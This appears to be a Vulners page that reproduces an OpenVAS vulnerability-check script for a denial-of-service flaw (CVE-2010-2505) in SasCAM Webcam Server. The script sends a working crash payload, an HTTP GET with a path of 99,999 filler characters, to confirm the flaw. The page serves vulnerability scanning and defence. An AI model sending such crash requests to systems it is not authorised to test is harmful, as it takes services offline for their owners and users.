Lucene search
+L

SasCAM Request Processing Denial of Service Vulnerability

🗓️ 02 Jul 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 23 Views

SasCAM Request Processing Denial of Service Vulnerability. Flaw in request handling can crash server, affecting Soft SaschArt SasCAM Webcam Server 2.7 and prio

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-2505
15 Jun 201000:00
circl
cve
CVE
CVE-2010-2505
28 Jun 201018:06
cve
cvelist
Cvelist
CVE-2010-2505
28 Jun 201018:06
cvelist
exploitdb
Exploit DB
SasCam 2.6.5 - Remote HTTP Server Crash
15 Jun 201000:00
exploitdb
euvd
EUVD
EUVD-2010-2509
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-2505
28 Jun 201018:30
nvd
openvas
OpenVAS
SasCAM Request Processing Denial of Service Vulnerability
2 Jul 201000:00
openvas
prion
Prion
Cross site request forgery (csrf)
28 Jun 201018:30
prion
redhatcve
RedhatCVE
CVE-2010-2505
22 May 202504:38
redhatcve
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.901132");
  script_version("2025-03-05T05:38:52+0000");
  script_tag(name:"last_modification", value:"2025-03-05 05:38:52 +0000 (Wed, 05 Mar 2025)");
  script_tag(name:"creation_date", value:"2010-07-02 08:02:13 +0200 (Fri, 02 Jul 2010)");
  script_cve_id("CVE-2010-2505");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_name("SasCAM Request Processing Denial of Service Vulnerability");
  script_xref(name:"URL", value:"http://secunia.com/advisories/40214");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/13888");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_family("Denial of Service");
  script_dependencies("gb_get_http_banner.nasl");
  script_require_ports("Services/www", 8080);
  script_mandatory_keys("SaServer/banner");

  script_tag(name:"impact", value:"Successful exploitation will allow attacker to crash the server
  process, resulting in a denial-of-service condition.");

  script_tag(name:"affected", value:"Soft SaschArt SasCAM Webcam Server 2.7 and prior.");

  script_tag(name:"insight", value:"The flaw is due to an error when handling certain requests, which
  can be exploited to block processing of further requests and terminate the
  application by sending specially crafted requests.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
  of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
  release, disable respective features, remove the product or replace the product by another one.");

  script_tag(name:"summary", value:"SasCam Webcam Server is prone to a denial of service (DoS) vulnerability.");

  script_tag(name:"solution_type", value:"WillNotFix");

  exit(0);
}

include("http_func.inc");
include("port_service_func.inc");

port = http_get_port(default:8080);

banner = http_get_remote_headers(port:port);

if("Server: SaServer" >< banner)
{

  if(http_is_dead(port: port))
    exit(0);

  sock = http_open_socket(port);
  if(!sock)
    exit(0);

  crash = http_get( item:"/"+ crap(99999),  port:port);
  send(socket:sock, data:crash);
  http_close_socket(sock);

  if (http_is_dead(port: port))
  {
    security_message(port);
    exit(0);
  }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Mar 2025 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25
EPSS0.02685
23